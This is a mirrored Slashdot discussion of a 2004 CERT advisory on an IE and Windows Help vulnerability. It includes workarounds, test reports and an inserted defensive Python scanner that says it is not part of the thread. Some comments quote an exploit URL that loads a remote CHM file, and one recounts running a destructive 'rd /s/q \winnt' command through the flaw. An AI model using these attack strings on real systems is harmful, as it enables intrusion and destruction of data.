Slashdot Mirror


New Windows Vulnerability in Help System

wesleyt writes "CERT announced today a significant Microsoft Windows vulnerability related to IE and its handling of the Windows help subsystem. There are currently no patches available and no virus definitions for the major scanners. As well, exploits have been reported in the wild. Because the vulnerability is in the help subsystem, even users who avoid Outlook and IE are vulnerable, since IE is the default handler for help files. It seems that this is going to be an ugly one."

29 of 576 comments

  1. MS by Fredbo · · Score: 5, Funny

    Microsoft is in some serious need of some help on this...

    1. Re:MS by netsharc · · Score: 5, Funny

      "It seems like you're trying to exploit a security hole. Would you like help?"

      --
      What time is it/will be over there? Check with my iPhone app!
  2. Privilege level by Gary+Destruction · · Score: 5, Insightful

    "could allow an attacker to execute arbitrary code with the privileges of the user running IE" This is why you run as a restricted user rather than administrator or power user. Restricted users don't have write or modify permissions to the WINNT or Program Files directories or subdirectories. And they certainly don't have permission to screw with the registry.

    1. Re:Privilege level by Gary+Destruction · · Score: 5, Informative

      Use the runas service to do administrative stuff. You can either use it in command line form or hold down shift and right click on an executable. It works on most control panel applets as well.

    2. Re:Privilege level by goat_attack · · Score: 5, Informative
      Unfortunately many programs and especially games require you have admin access to work, i.e. The Sims (god knows why). Imagine teaching your mother to use one account for installs, and another for her email and browsing, then throw in some stuff that will only work under admin and you'll quickly see where this goes.

      This is a much broader problem than merely stupid/lazy users.

    3. Re:Privilege level by Lukey+Boy · · Score: 5, Insightful

      You realize that's only valid in the context of a corporate setup, right? Most viruses and trojans infest home systems. Of course it's easy to reimage a machine in an office - it's the fabled "Aunt Tillie" we have to worry about.

    4. Re:Privilege level by Halfbaked+Plan · · Score: 5, Insightful

      I used to try running Windows 2000 as a non-privileged user.

      The problem is, not every Windows program out there is written to be aware of the fine-grained security model of Windows NT. In a 'perfect world' every Windows developer would code properly, with security in mind. As it stands, the complex NT security model is just ignored by a lot of people. It might work great in a locked-down corporate environment with a limited set of software, i.e. where the user isn't allowed to install anything, and the software installed is a narrow well-tested set. It won't ever work in looser environments. Given the lax 'security culture' of Microsoft and its user base, it's unworkable.

      --
      resigned
    5. Re:Privilege level by pe1chl · · Score: 5, Insightful

      This is like saying that keylocks work well in a bank, but will never be workable in normal life. People will lose keys, will find it uncomfortable to carry keyrings, etc.

      Sure there is some truth in that, but as more and more people don't respect other people's property, keylocks have become a necessity and have to be lived with, no matter the discomfort.

      The same is now happening with software security.

    6. Re:Privilege level by ymgve · · Score: 5, Interesting

      Games need Administrator privileges because the copy protection systems use driver tricks that are only available to administrators. Yet another reason why copy protection should be abolished.

  3. Windows XP SP2 by Anonymous Coward · · Score: 5, Informative

    Although there's no specific patch, the Windows XP SP2 release candidate mitigates this problem.

  4. Horrible by S.I.O. · · Score: 5, Funny

    > and no virus definitions for the major scanners

    Jesus, even my ScanJet is vulnerable?

  5. Today? by Troed · · Score: 5, Informative

    They announced this TODAY? It has been discussed on Bugtraq for weeks - and due to a few comments I made in their discussion forum the Swedish IDG.se reported this last Friday. I've also linked to one of the PoC-exploits here on Slashdot for people to check for themselves. ... what took them so long?

    Jelmer's PoC is good: link

    (That page is the info page, you won't get hit by clicking on the link directly)

  6. start the stopwatch... by rapiddescent · · Score: 5, Insightful

    now would be a very good time to start the clocks to see how long it takes them to get a patch out. Should be a good case in point for the Forrester research published last week. rd

    1. Re:start the stopwatch... by exmsfty · · Score: 5, Interesting

      Well, the interesting thing to me is I was a contract tester on the HTMLHELP team in 1999...and I filed a bug report for this very exploit. So by my stopwatch we are at 5 years and counting. FWIW, I used this exploit to nuke my boss's computer via the "Goodtimes" virus...yea, it was a hoax, but with this exploit I could run "rd /s/q \winnt" from the Preview Pane of Outlook :) If you care then write ShaneMc@microsoft.com and ask him why it wasn't fixed 5 years ago.

  7. Afraid by InternationalCow · · Score: 5, Interesting

    I don't know about the rest of you, but things like these are actually scaring me out of running Windows. Apart from my powerbooks (no problems there) I have one PC laptop on which I run WinXP and Linux and I like to use Windows for its ACPI support, but I'm now constantly afraid that some as yet undescribed security hole will allow someone to screw up my computer/home network. Brrrr. No Windows any longer, I'm sick and tired of being afraid when using my computer.

    --
    ----- One learns to itch where one can scratch.
  8. Workaround by KingRob · · Score: 5, Informative

    Remember to backup your registry (or at least this portion of it)
    From the CERT article:

    Currently, there is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below.

    Disable ITS protocol handlers
    Disabling ITS protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:

    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk}
    Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.

    Follow good Internet security practices
    These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities.

    Disable Active scripting and ActiveX controls

    NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.

    Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.

    Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.

    Do not follow unsolicited links
    Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.

    Maintain updated anti-virus software
    Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

  9. Use the RUNAS service by Gary+Destruction · · Score: 5, Informative

    The RUNAS service will allow you to run an executable with elevated privileges. And shortcuts have the option to run as a different user by clicking the check box that says, "Run as different user." To use the RUNAS service, just hold down shift and right-click and you'll see an option that says "Run As".

  10. This is point in fact... by tuxlove · · Score: 5, Insightful

    ... that not publishing vulnerabilities doesn't stop exploits. This one had exploits long before the vulnerability was known to anyone but the hackers. I have to laugh every time MS whines about how problems would go away if vulnerabilities were never disclosed, except to the vendor of course. The only thing that might go away is the bad PR, if even that.

  11. Re:I know, I know.. by heironymouscoward · · Score: 5, Insightful

    At the risk of replying to a Microsoft troll, this is not a "pretty insignificant" story.

    Errors in server-side applications are rapidly fixed by serious system administrators and at the worst they provide attackers a way into unprotected systems. How many computers around the world are currently infected or zombied thanks to holes in any of the programs you cited? Almost zero.

    Security holes in client-side applications (MSIE, Outlook, primarily) are a totally different story. These programs are mainly used by people who don't have the capacity to protect their systems. And the results are clear: millions of PCs infected by everything from viruses to worms and spywares, used as platforms to launch DDoS attacks, to send spam, to steal information...

    There is a real security problem on the Internet, one that is making a joke of the "information highway", and it's almost entirely caused by vulnerabilities like the one reported here.

    Until the market leader realizes that its users need serious protection from the malicious forces who roam the Internet, no amount of criticism is too much. And, if you really want to support and defend Microsoft, you should be adding your voice, because it is this issue - its failure to provide its users with a safe platform - which will be its downfall.

    "Microsoft = insecure" is an association that should be sending shivers down the backs of those marketing managers trying to bomb the web with billions of Microsoft adverts.

    --
    Ceci n'est pas une signature
  12. well by circletimessquare · · Score: 5, Funny

    i loaded up ie, went help... contents and index... search... and typed in "help subsystem vulnerable" and hit list topics

    a pop up box announced "no topics found"

    so what is everyone talking about? this doesn't seem to be a problem

    --
    intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
  13. Administrators: quick fix by AnonymousDot · · Score: 5, Informative
    Create a .REG file with this content:
    REGEDIT4

    [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\its]
    [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\mk]
    [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-its]
    [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-itss]
    Remove the spaces that slashcode adds!

    Save it as chm-disable.reg
    Put a line like this in your logon script:
    regedit /s chm-disable.reg
    Use the same trick to restore the values when a patch is available (that means that you must save the HANDLER keys first).
    Note: If you're still using batch files: KiXtart is your friend!
  14. Mod Parent UP! by Chordonblue · · Score: 5, Interesting

    Where's my friggin points when I need them?

    Look, this is absolutely true. There is still plenty of software out there that breaks under W2K/WXP when not run as a local administrator.

    And forget 'looser' environments. I run a network at a private school. Care to take a guess how much educational software cares about following the rules properly? Grrr!!!

    --
    "...Well, there's egg and bacon; egg sausage and bacon; egg and spam; egg bacon and spam; egg bacon sausage and spam..."
  15. But but but... by Jesrad · · Score: 5, Informative

    ...but Mr MS-Security himself said that there were NO exploits prior to the security patches !

    --
    Maybe we deserve this world ?
  16. Re:Actually, mac users haven't had a virus yet by thesupraman · · Score: 5, Insightful

    Taken from Sophos....

    http://www.sophos.com/virusinfo/analyses/index_m ac exe.html

    Description: Macintosh file virus

    666, see Mac/Sevendust-A
    ANTI-A, see Mac/ANTI-A
    CDEF, see Mac/CDEF
    CODE-1, see Mac/CODE-1
    CODE-252, see Mac/CODE-252
    CODE-9811, see Mac/CODE-9811
    ERIC, see Mac/Scores
    Garfield, see Mac/MDEF-A
    Graphics Accelerator, see Mac/SevenD-Fam
    INIT-1984, see Mac/INIT-1984
    INIT-29, see Mac/INIT-29
    INIT-9403, see Mac/INIT-9403
    INIT-M, see Mac/INIT-M
    Mac/ANTI-A
    Mac/CDEF
    Mac/CODE-1
    Mac/CODE-252
    Mac/CODE-9811
    Mac/INIT-1984
    Mac/INIT-29
    Mac/INIT-9403
    Mac/INIT-M
    Mac/MBDF-A
    Mac/MBDF-B
    Mac/MDEF-A
    Mac/nVIR-A
    Mac/nVIR-B
    Mac/nVIR-Fam
    Mac/Scores
    Mac/SevenD-C
    Mac/SevenD-D
    Mac/SevenD-Fam
    Mac/Sevendust-A
    Mac/Sevendust-B
    Mac/Sevendust-J
    Mac/T4
    Mac/WDEF
    Mac/ZUC-A
    MBDF-A, see Mac/MBDF-A
    MBDF-B, see Mac/MBDF-B
    MDEF 666, see Mac/Sevendust-A
    MDEF 9806, see Mac/Sevendust-A
    MDEF-A, see Mac/MDEF-A
    NASA VULT, see Mac/Scores
    nVIR-A, see Mac/nVIR-A
    nVIR-B, see Mac/nVIR-B
    nVIR-Fam, see Mac/nVIR-Fam
    San Jose Flu, see Mac/Scores
    Scores, see Mac/Scores
    SevenD-C, see Mac/SevenD-C
    SevenD-D, see Mac/SevenD-D
    SevenD-Fam, see Mac/SevenD-Fam
    Sevendust-A, see Mac/Sevendust-A
    Sevendust-B, see Mac/Sevendust-B
    Sevendust-J, see Mac/Sevendust-J
    SysX, see Mac/INIT-9403
    T4, see Mac/T4
    WDEF, see Mac/WDEF
    ZUC-A, see Mac/ZUC-A

  17. Not the point by bangular · · Score: 5, Insightful

    That's not the point. MS has tried to lead the public to believe that there's never been an instance of exploit code before their patch. And obviously if there's exploit code out there, something already "really bad" has happened. This comes after the witty worm spread before ISS had patches for their products.

    On a related note, MS pretty much NEVER releases advisories on their own will before a patch. There almost always has to be a 3rd party that has said they are going to go public, or there have to be exploits or information in the wild. With that information, I wonder if this exploit is related to the windows source leak. The source leak had a lot of IE code, and if there are exploits in the wild before MS could even send out an advisory. That would lead me to the possibility that the windows source leak could be the source of this one.

    1. Re:Not the point by Vancorps · · Score: 5, Insightful
      The code was for IE5, this is very unlikely. And a patch is available, it's called shutting off the help sub-system. With Windows 2000 and XP it is a service, one which I never use, although I'm sure some people do.

      As for MS statements about exploits, well... everyone knows that's just plain silly. Right now there is an Exchange vulnerability listed on CERT that contains no patch and several known exploits, has been that way since November.

      This is yet another occasion to teach everyone how to run as a user in Windows and not as Administrator. Almost everything is negated or at least mitigated when they are just normal users. Sure it could wipe out their own documents, but it couldn't affect any others and certainly couldn't harm the operating system.

      I see this problem a lot on every platform, generally I think people like to feel in control all the time

  18. Re:What browser to use? by pedrop357 · · Score: 5, Informative

    I played with fire and tested the PoC found here

    In IE, it copied itself over wmplayer.exe, SFP copied the original back, but that was enough for me. Firefox 0.8, OTOH, didn't budge and nothing happened to wmplayer.exe. Same thing with Netscape 7.1 and Opera 7.23.

    At least in this case, IE seems to be the only one.

  19. Quick tests on some Windows XP systems by Kagami001 · · Score: 5, Informative

    I ran a few quick tests on a couple of different Windows XP systems using the proof of concept exploit code here.

    ---------
    Windows XP Professional Service Pack 1

    Mozilla Firebird 0.8 run as limited user: no apparent effect
    Mozilla Firebird 0.8 run as administrator: no apparent effect

    Internet Explorer 6 run as limited user causes an Internet Explorer Script Error:

    Line 47, Char: 5, Error: Write to file failed, Code: 0
    URL: ms-its:mhtml:file://C:\foo.mht!http://ip3e83566f.speed.planet.nl/security/newone/modified//EXPLOIT.CHM::/exploit.htm

    Internet Explorer 6 run as administrator: demo exploit runs as expected

    A software restriction policy is in place on this machine, forbidding the execution of any executable files (including .chm) in any directories except for the ProgramFilesDir and System directories, but, as you can see, it did not stop the sample code from executing when IE was run with administrator privileges.
    ------------

    Windows XP Professional Service Pack 2 RC 1

    Internet Explorer 6 run as administrator: no apparent effect

    Fixed in SP2?
    ---------------

    One thing that concerns me about using this particular sample code as a test, is that it seems to rely on having write permission to \Program Files, thus requiring administrator privileges (usually) and thus making limited user accounts appear to be invulnerable -- but are they? Can a version of this exploit be written that runs even if the user does not have write privileges to the program files and system directories? (Thus giving access to all of the limited user's files.) In such a case, would software restriction policies prevent the execution of the exploit exe even if not stopping the script itself?
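
A defender-side check for the URL shape shown in the script error quoted in the comment above, added here as an example that is not part of the thread, the CERT advisory or any vendor tool: it scans page or mail content for the four ITS handlers named in the CERT workaround and flags only references that go through `mhtml:` or fetch from a remote host. Function names, the "remote" heuristic and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# The four protocol handlers named in the CERT workaround quoted in this thread.
ITS_HANDLERS = ("ms-itss", "ms-its", "its", "mk")

# A handler name at a token boundary, followed by ':' and the rest of the URL.
_HANDLER_RE = re.compile(
    r"(?<![A-Za-z0-9+.\-])(ms-itss|ms-its|its|mk):([^\s\"'<>]+)", re.IGNORECASE)
# Assumption: "remote" means an http, https or ftp URL embedded in the reference.
_REMOTE_RE = re.compile(r"(?:https?|ftp)://", re.IGNORECASE)


def find_its_urls(text):
    """Return every ITS-handler reference in text, suspicious or not."""
    findings = []
    decoded = unquote(text)  # also catches percent-encoded forms such as ms%2Dits:
    for m in _HANDLER_RE.finditer(decoded):
        handler, rest = m.group(1).lower(), m.group(2)
        # 'mk:' only addresses compiled help in its mk:@MSITStore: form.
        if handler == "mk" and not rest.lower().startswith("@msitstore:"):
            continue
        findings.append({
            "handler": handler,
            "url": m.group(0),
            "remote": bool(_REMOTE_RE.search(rest)),
            "mhtml_redirect": rest.lower().startswith("mhtml:"),
        })
    return findings


def scan_lines(lines):
    """Return (line_number, finding) pairs worth an analyst's attention.

    Local help links (ms-its:C:\\WINDOWS\\Help\\...) are normal Help traffic,
    so only remote or mhtml-wrapped references are reported.
    """
    hits = []
    for number, line in enumerate(lines, 1):
        for finding in find_its_urls(line):
            if finding["remote"] or finding["mhtml_redirect"]:
                hits.append((number, finding))
    return hits


# Constructed sample content (hosts and file names are placeholders).
SAMPLE = [
    '<a href="ms-its:C:\\WINDOWS\\Help\\ntcmds.chm::/ntcmds.htm">local help</a>',
    '<iframe src="ms-its:mhtml:file://C:\\foo.mht!http://host.example.test/a/x.chm::/p.htm">',
    '<img src="ms%2Dits:mhtml:file://C:\\nx.mht!http://host.example.test/y.chm::/q.htm">',
    'Each vendor has its:own idea of a fix, and merits:none.',
    '<a href="ms-itss:mhtml:file://C:\\nx.mht!https://host.example.test/z.chm::/r.htm">x</a>',
    'mk:@MSITStore:C:\\WINDOWS\\Help\\access.chm::/a.htm',
]

if __name__ == "__main__":
    for number, finding in scan_lines(SAMPLE):
        print(f"line {number}: {finding['handler']} -> {finding['url']}")
```

The prose line with `its:own` is matched by the pattern but not reported, which is why the report filters on the remote and `mhtml:` properties rather than on the handler name alone.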

  20. In Linux-land... by gosand · · Score: 5, Funny

    Imagine teaching your mother to use one account for installs, and another for her email and browsing, then throw in some stuff that will only work under admin and you'll quickly see where this goes.

    Somewhere in Linux-land, a phone rings....

    Hello? Oh, hi mom. Yeah, I can help you install a program on your computer. What do you want to install? Oh, cool. Have you downloaded it? Good job. OK, open up a terminal.... it's a command line interface, where you type commands. Much more powerful than a GUI. Where did you save the file? You don't remember? Hmm. Just type "cd". Now type "ls". Do you see the file name? Great! OK, type "tar -zxf "

    It didn't work? What does it say? OK. What is the name of the file you downloaded? Oh, well, that is a bzip file, not a tar and gzipped file. So type the same thing as before, but use "bzip2" instead of "tar".

    What? Why didn't it work? Oh, it doesn't have the same syntax. Crap. Go to the man page. Oh, man stands for manual. Type "man bzip2". What does it say?

    (20 minutes later)

    OK, now we have uncompressed the files you need. No, not yet. Type "./configure" No, it's OK, it is figuring out what kind of computer and software you have.

    OK, now type "make" OK, call me back when it is done.

    (15 minutes later)

    OK, now type "make install" What? Why not? What does it say? No, not that. Oh, wait, you have to be root. It is an administrator user.
    Because not just everyone can install programs, for security reasons. Look, just change to the admin user by typing "su". OK, now enter the root password. I DON'T KNOW! You mean you don't know your root password?

    (10 minutes later)

    Mom, you should NOT use the dog's name as the password. Because it is insecure! Nevermind. Just type "make install". There. Now it is installed.

    No, there is no icon, you have to type the name of program to run it. Type it. What? I don't know, what was the name of the binary after you compiled it? A binary file is a program you run. You compiled it when you typed "make". Hmm, let's look in the Makefile. Type "vi Makefile". What do you mean it is blank? Oh, wait. Use capital M. Type ":r Makefile" with a capital M.

    OK, now you are in vi, the most powerful editor ever. WHAT DO YOU MEAN YOU PREFER EMACS!!!!

    --

    My beliefs do not require that you agree with them.